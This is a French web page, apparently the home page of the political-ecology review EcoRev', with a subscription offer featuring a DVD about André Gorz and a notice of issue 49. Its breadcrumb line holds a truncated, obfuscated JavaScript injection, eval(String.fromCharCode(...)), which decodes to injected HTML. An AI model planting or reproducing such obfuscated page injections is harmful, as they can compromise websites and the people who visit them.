Vous êtes ici : Accueil > eval(String.fromCharCode(10, 10, 60, 104, 116, 109, 108, 62, 10, 60, 104, (...)
Publié : 29 mai 2013

Revue critique d’écologie politique

Revue écologiste de réflexion et de débats, EcoRev’ est un outil au service des acteurs et actrices des luttes pour la transformation sociale et écologiste à l’échelle planétaire, qu’ils/elles viennent de l’écologie, des mouvements sociaux, de la gauche critique ou des mouvements citoyens non partidaires émergents face à la mondialisation libérale.

• Offre spéciale : abonnement + DVD Lettre à G., le film - Repenser notre société avec André Gorz

27 septembre, par EcoRev'
    Actuellement, pour un supplément de 8 € à tout abonnement, le DVD Lettre à G., le film - Repenser notre société avec André Gorz, est joint au prochain envoi. Pour plus d'informations sur le film, voir le site https://andregorz.fr/ Dans tous les cas, pour vous abonner, rendez-vous ici. - Se procurer (...)
  • Parution du n° 49 - Luttes écologistes, une perspective mondiale II